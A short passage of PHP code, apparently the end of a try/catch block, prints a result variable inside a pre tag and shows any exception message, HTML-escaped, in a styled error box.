echo '<pre>', $out, '</pre>';
} catch (Exception $exception) {
echo '<pre class="alert alert-danger">', htmlspecialchars($exception->getMessage()), '</pre>';
}